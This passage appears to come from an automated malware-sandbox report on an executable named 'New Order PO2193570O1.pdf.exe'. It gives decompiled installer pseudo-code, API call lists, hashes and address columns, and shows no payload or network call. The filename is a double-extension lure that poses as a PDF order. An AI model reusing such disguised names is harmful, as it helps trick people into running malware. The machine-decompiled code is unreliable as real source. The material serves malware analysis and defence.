                                                                                                                              0x004050cc
                                                                                                                              0x004050cf
                                                                                                                              0x004050db
                                                                                                                              0x004050e4
                                                                                                                              0x004050ed
                                                                                                                              0x00405110
                                                                                                                              0x00405116
                                                                                                                              0x00405127
                                                                                                                              0x0040512c
                                                                                                                              0x0040513a
                                                                                                                              0x00405148
                                                                                                                              0x00405148
                                                                                                                              0x0040514d
                                                                                                                              0x0040515b
                                                                                                                              0x0040515b
                                                                                                                              0x00405160
                                                                                                                              0x00405163
                                                                                                                              0x00405168
                                                                                                                              0x00405174
                                                                                                                              0x0040517d
                                                                                                                              0x0040518a
                                                                                                                              0x00405199
                                                                                                                              0x0040518c
                                                                                                                              0x00405191
                                                                                                                              0x00405191
                                                                                                                              0x004051a5
                                                                                                                              0x004051a5
                                                                                                                              0x004051b9
                                                                                                                              0x004051c2
                                                                                                                              0x004051cb
                                                                                                                              0x004051db
                                                                                                                              0x004051e7
                                                                                                                              0x004051e7
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32 ref: 004050A1
                                                                                                                              • GetDlgItem.USER32 ref: 004050B0
                                                                                                                              • GetClientRect.USER32 ref: 004050ED
                                                                                                                              • GetSystemMetrics.USER32 ref: 004050F5
                                                                                                                              • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405116
                                                                                                                              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405127
                                                                                                                              • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 0040513A
                                                                                                                              • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405148
                                                                                                                              • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040515B
                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040517D
                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405191
                                                                                                                              • GetDlgItem.USER32 ref: 004051B2
                                                                                                                              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004051C2
                                                                                                                              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004051DB
                                                                                                                              • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 004051E7
                                                                                                                              • GetDlgItem.USER32 ref: 004050BF
                                                                                                                                • Part of subcall function 00403F4D: SendMessageA.USER32(00000028,?,00000001,00403D7E), ref: 00403F5B
                                                                                                                              • GetDlgItem.USER32 ref: 00405204
                                                                                                                              • CreateThread.KERNEL32 ref: 00405212
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405219
                                                                                                                              • ShowWindow.USER32(00000000), ref: 0040523D
                                                                                                                              • ShowWindow.USER32(00000000,00000008), ref: 00405242
                                                                                                                              • ShowWindow.USER32(00000008), ref: 00405289
                                                                                                                              • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 004052BB
                                                                                                                              • CreatePopupMenu.USER32 ref: 004052CC
                                                                                                                              • AppendMenuA.USER32 ref: 004052E1
                                                                                                                              • GetWindowRect.USER32 ref: 004052F4
                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405318
                                                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405353
                                                                                                                              • OpenClipboard.USER32(00000000), ref: 00405363
                                                                                                                              • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405369
                                                                                                                              • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405372
                                                                                                                              • GlobalLock.KERNEL32 ref: 0040537C
                                                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405390
                                                                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004053A8
                                                                                                                              • SetClipboardData.USER32 ref: 004053B3
                                                                                                                              • CloseClipboard.USER32 ref: 004053B9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                              • String ID: {
                                                                                                                              • API String ID: 590372296-366298937
                                                                                                                              • Opcode ID: 5aa5e299d21103ac010b4f938d0fd54a6532c41be376ce1bb5dd201a3ba19c05
                                                                                                                              • Instruction ID: b28aa7ce0402c6385ba5b6cd868a6258f1d07b471923b7bae974b2a68da01879
                                                                                                                              • Opcode Fuzzy Hash: 5aa5e299d21103ac010b4f938d0fd54a6532c41be376ce1bb5dd201a3ba19c05
                                                                                                                              • Instruction Fuzzy Hash: 34A14870904208FFDB219F60DD89AAE7F79FB08355F00417AFA05BA2A0C7795A41DF69
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00404356, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 78%
                                                                                                                              			E00404356(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				signed int* _t145;
				intOrPtr _t147;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x41fc70;
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E0040540B(0x3fb, _t162);
					E00405DC8(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040540B(0x3fb, _t162);
							if(E0040573A(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E00405B66(0x41f468, _t162);
							_t145 = 0;
							_t86 = E00405E88(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E00405B66(0x41f468, _t162);
								_t88 = E004056ED(0x41f468);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f468,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f468) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f468,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E004056A0(0x41f468) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x41f468) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E004047A6(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								_t147 =  *0x42367c; // 0x565f8f
								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
									E004046F1(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x41f458);
									} else {
										E004046F1(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x423f44 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403F3A(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x42048c == _t145) {
									E004042EB();
								}
								 *0x42048c = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x4204a0;
							_v56 = E0040468B;
							_v52 = _t162;
							_v64 = E00405B88(0x3fb, 0x4204a0, _t162, 0x41f870, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405659(_t162);
								_t124 =  *0x423eb0; // 0x55edd0
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E00405B88(0x3fb, 0x4204a0, _t162, 0, _t125);
									if(lstrcmpiA(0x422e40, 0x4204a0) != 0) {
										lstrcatA(_t162, 0x422e40);
									}
								}
								 *0x42048c =  &(( *0x42048c)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E004056C6(_t162) != 0 && E004056ED(_t162) == 0) {
						E00405659(_t162);
					}
					 *0x423678 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403F18(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403F18(_t159);
					E00403F4D(_v12);
					_t138 = E00405E88(7);
					if(_t138 == 0) {
						L53:
						return E00403F7F(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}








































                                                                                                                              0x0040435c
                                                                                                                              0x00404363
                                                                                                                              0x0040436f
                                                                                                                              0x0040437d
                                                                                                                              0x00404385
                                                                                                                              0x00404389
                                                                                                                              0x0040438f
                                                                                                                              0x0040438f
                                                                                                                              0x0040439b
                                                                                                                              0x0040440f
                                                                                                                              0x00404416
                                                                                                                              0x004044eb
                                                                                                                              0x004044f2
                                                                                                                              0x00404501
                                                                                                                              0x00404501
                                                                                                                              0x00404505
                                                                                                                              0x0040450b
                                                                                                                              0x00404518
                                                                                                                              0x0040451a
                                                                                                                              0x0040451a
                                                                                                                              0x00404528
                                                                                                                              0x0040452d
                                                                                                                              0x00404530
                                                                                                                              0x00404537
                                                                                                                              0x0040453a
                                                                                                                              0x00404571
                                                                                                                              0x00404573
                                                                                                                              0x00404579
                                                                                                                              0x00404580
                                                                                                                              0x00404582
                                                                                                                              0x00404582
                                                                                                                              0x0040459e
                                                                                                                              0x004045da
                                                                                                                              0x00000000
                                                                                                                              0x004045a0
                                                                                                                              0x004045a3
                                                                                                                              0x004045b7
                                                                                                                              0x004045b9
                                                                                                                              0x00000000
                                                                                                                              0x004045b9
                                                                                                                              0x0040453c
                                                                                                                              0x00404540
                                                                                                                              0x0040456f
                                                                                                                              0x0040456f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00404542
                                                                                                                              0x00404542
                                                                                                                              0x0040454f
                                                                                                                              0x00404554
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00404558
                                                                                                                              0x0040455a
                                                                                                                              0x0040455a
                                                                                                                              0x00404565
                                                                                                                              0x00404568
                                                                                                                              0x0040456d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040456d
                                                                                                                              0x004045c8
                                                                                                                              0x004045cf
                                                                                                                              0x004045d6
                                                                                                                              0x004045dd
                                                                                                                              0x004045dd
                                                                                                                              0x004045e2
                                                                                                                              0x004045e4
                                                                                                                              0x004045ec
                                                                                                                              0x004045f2
                                                                                                                              0x004045f2
                                                                                                                              0x004045f9
                                                                                                                              0x00404602
                                                                                                                              0x0040460c
                                                                                                                              0x00404614
                                                                                                                              0x0040462a
                                                                                                                              0x00404616
                                                                                                                              0x0040461a
                                                                                                                              0x0040461a
                                                                                                                              0x00404614
                                                                                                                              0x0040462f
                                                                                                                              0x00404634
                                                                                                                              0x00404639
                                                                                                                              0x00404642
                                                                                                                              0x00404642
                                                                                                                              0x0040464b
                                                                                                                              0x0040464d
                                                                                                                              0x0040464d
                                                                                                                              0x00404659
                                                                                                                              0x00404661
                                                                                                                              0x0040466b
                                                                                                                              0x0040466b
                                                                                                                              0x00404670
                                                                                                                              0x00000000
                                                                                                                              0x00404670
                                                                                                                              0x0040453a
                                                                                                                              0x004044f4
                                                                                                                              0x004044fb
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004044fb
                                                                                                                              0x0040441c
                                                                                                                              0x00404422
                                                                                                                              0x0040443c
                                                                                                                              0x00404441
                                                                                                                              0x0040444b
                                                                                                                              0x00404452
                                                                                                                              0x00404461
                                                                                                                              0x00404464
                                                                                                                              0x00404467
                                                                                                                              0x0040446e
                                                                                                                              0x00404476
                                                                                                                              0x00404479
                                                                                                                              0x0040447d
                                                                                                                              0x00404484
                                                                                                                              0x0040448c
                                                                                                                              0x004044e4
                                                                                                                              0x0040448e
                                                                                                                              0x0040448f
                                                                                                                              0x00404496
                                                                                                                              0x0040449b
                                                                                                                              0x004044a0
                                                                                                                              0x004044a8
                                                                                                                              0x004044b5
                                                                                                                              0x004044c9
                                                                                                                              0x004044cd
                                                                                                                              0x004044cd
                                                                                                                              0x004044c9
                                                                                                                              0x004044d2
                                                                                                                              0x004044dd
                                                                                                                              0x004044dd
                                                                                                                              0x0040448c
                                                                                                                              0x00000000
                                                                                                                              0x00404441
                                                                                                                              0x0040442f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00404435
                                                                                                                              0x00000000
                                                                                                                              0x0040439d
                                                                                                                              0x0040439d
                                                                                                                              0x004043a9
                                                                                                                              0x004043b3
                                                                                                                              0x004043c0
                                                                                                                              0x004043c0
                                                                                                                              0x004043c6
                                                                                                                              0x004043cf
                                                                                                                              0x004043d8
                                                                                                                              0x004043db
                                                                                                                              0x004043de
                                                                                                                              0x004043e6
                                                                                                                              0x004043e9
                                                                                                                              0x004043ec
                                                                                                                              0x004043f4
                                                                                                                              0x004043fb
                                                                                                                              0x00404402
                                                                                                                              0x00404676
                                                                                                                              0x00404688
                                                                                                                              0x00404688
                                                                                                                              0x0040440d
                                                                                                                              0x00000000
                                                                                                                              0x0040440d

                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32 ref: 004043A2
                                                                                                                              • SetWindowTextA.USER32(?,?), ref: 004043CF
                                                                                                                              • SHBrowseForFolderA.SHELL32(?,0041F870,?), ref: 00404484
                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 0040448F
                                                                                                                              • lstrcmpiA.KERNEL32(Call,004204A0,00000000,?,?), ref: 004044C1
                                                                                                                              • lstrcatA.KERNEL32(?,Call), ref: 004044CD
                                                                                                                              • SetDlgItemTextA.USER32 ref: 004044DD
                                                                                                                                • Part of subcall function 0040540B: GetDlgItemTextA.USER32 ref: 0040541E
                                                                                                                                • Part of subcall function 00405DC8: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
                                                                                                                                • Part of subcall function 00405DC8: CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                                                                • Part of subcall function 00405DC8: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
                                                                                                                                • Part of subcall function 00405DC8: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42
                                                                                                                              • GetDiskFreeSpaceA.KERNEL32(0041F468,?,?,0000040F,?,0041F468,0041F468,?,00000000,0041F468,?,?,000003FB,?), ref: 00404596
                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B1
                                                                                                                              • SetDlgItemTextA.USER32 ref: 0040462A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                                              • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                                                                                              • API String ID: 2246997448-2678639445
                                                                                                                              • Opcode ID: 6525314df4a180c9e7b66623ed26d8b7b6bbf618626a18de822d55977fdbc2f3
                                                                                                                              • Instruction ID: fa341535892c43c3a67d7fcafb17cb6574160925603278dae289bcadb551eaae
                                                                                                                              • Opcode Fuzzy Hash: 6525314df4a180c9e7b66623ed26d8b7b6bbf618626a18de822d55977fdbc2f3
                                                                                                                              • Instruction Fuzzy Hash: 2D9170B1900218BBDB11AFA1CD84AAF7BB8EF45314F10847BF704B6291D77C9A41DB59
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405B88, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 74%
                                                                                                                              			E00405B88(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				intOrPtr _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr _t79;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t79 =  *0x42367c; // 0x565f8f
					_t36 =  *(_t79 - 4 + _t36 * 4);
				}
				_t73 =  *0x423ed8; // 0x5644b8
				_t74 = _t73 + _t36;
				_t37 = 0x422e40;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x422e40;
				if(_a4 - 0x422e40 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405B88(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x422e40;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x424000;
							E00405B66(_t86, (_t95 << 0xa) + 0x424000);
						} else {
							E00405AC4(_t86,  *0x423ea8);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405DC8(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f24;
						if( *0x423f24 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x423ea4; // 0x74691340
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x423ea8,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x423ed8;
							E00405A4D(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423ed8, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405B88(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405B66(_a4, _t37);
			}






























                                                                                                                              0x00405b88
                                                                                                                              0x00405b88
                                                                                                                              0x00405b88
                                                                                                                              0x00405b8e
                                                                                                                              0x00405b93
                                                                                                                              0x00405b95
                                                                                                                              0x00405ba4
                                                                                                                              0x00405ba4
                                                                                                                              0x00405ba6
                                                                                                                              0x00405baf
                                                                                                                              0x00405bb1
                                                                                                                              0x00405bb6
                                                                                                                              0x00405bb9
                                                                                                                              0x00405bba
                                                                                                                              0x00405bc1
                                                                                                                              0x00405bc3
                                                                                                                              0x00405bc9
                                                                                                                              0x00405bcc
                                                                                                                              0x00405bcc
                                                                                                                              0x00405da5
                                                                                                                              0x00405da5
                                                                                                                              0x00405da9
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405bd9
                                                                                                                              0x00405bdf
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405be5
                                                                                                                              0x00405be6
                                                                                                                              0x00405be9
                                                                                                                              0x00405bec
                                                                                                                              0x00405d98
                                                                                                                              0x00405da2
                                                                                                                              0x00405da4
                                                                                                                              0x00405da4
                                                                                                                              0x00405d9a
                                                                                                                              0x00405d9c
                                                                                                                              0x00405d9e
                                                                                                                              0x00405d9f
                                                                                                                              0x00405d9f
                                                                                                                              0x00000000
                                                                                                                              0x00405d98
                                                                                                                              0x00405bf2
                                                                                                                              0x00405bf6
                                                                                                                              0x00405c06
                                                                                                                              0x00405c0a
                                                                                                                              0x00405c11
                                                                                                                              0x00405c14
                                                                                                                              0x00405c18
                                                                                                                              0x00405c1e
                                                                                                                              0x00405c21
                                                                                                                              0x00405c24
                                                                                                                              0x00405c27
                                                                                                                              0x00405d42
                                                                                                                              0x00405d45
                                                                                                                              0x00405d75
                                                                                                                              0x00405d78
                                                                                                                              0x00405d7d
                                                                                                                              0x00405d81
                                                                                                                              0x00405d81
                                                                                                                              0x00405d86
                                                                                                                              0x00405d87
                                                                                                                              0x00405d8c
                                                                                                                              0x00405d8f
                                                                                                                              0x00405d91
                                                                                                                              0x00000000
                                                                                                                              0x00405d91
                                                                                                                              0x00405d47
                                                                                                                              0x00405d4a
                                                                                                                              0x00405d5f
                                                                                                                              0x00405d66
                                                                                                                              0x00405d4c
                                                                                                                              0x00405d53
                                                                                                                              0x00405d53
                                                                                                                              0x00405d6e
                                                                                                                              0x00405d71
                                                                                                                              0x00405d3a
                                                                                                                              0x00405d3b
                                                                                                                              0x00405d3b
                                                                                                                              0x00000000
                                                                                                                              0x00405d71
                                                                                                                              0x00405c2f
                                                                                                                              0x00405c30
                                                                                                                              0x00405c36
                                                                                                                              0x00405c38
                                                                                                                              0x00405c52
                                                                                                                              0x00405c52
                                                                                                                              0x00405c59
                                                                                                                              0x00405c59
                                                                                                                              0x00405c60
                                                                                                                              0x00405c64
                                                                                                                              0x00405c64
                                                                                                                              0x00405c65
                                                                                                                              0x00405c67
                                                                                                                              0x00405ca0
                                                                                                                              0x00405ca3
                                                                                                                              0x00405cb3
                                                                                                                              0x00405cb6
                                                                                                                              0x00405cbe
                                                                                                                              0x00405cc4
                                                                                                                              0x00405cc4
                                                                                                                              0x00405d20
                                                                                                                              0x00405d20
                                                                                                                              0x00405d22
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405cc8
                                                                                                                              0x00405ccf
                                                                                                                              0x00405cd0
                                                                                                                              0x00405cd2
                                                                                                                              0x00405cec
                                                                                                                              0x00405cfa
                                                                                                                              0x00405d00
                                                                                                                              0x00405d02
                                                                                                                              0x00405d1d
                                                                                                                              0x00405d1d
                                                                                                                              0x00405d1d
                                                                                                                              0x00000000
                                                                                                                              0x00405d1d
                                                                                                                              0x00405d08
                                                                                                                              0x00405d13
                                                                                                                              0x00405d19
                                                                                                                              0x00405d1b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
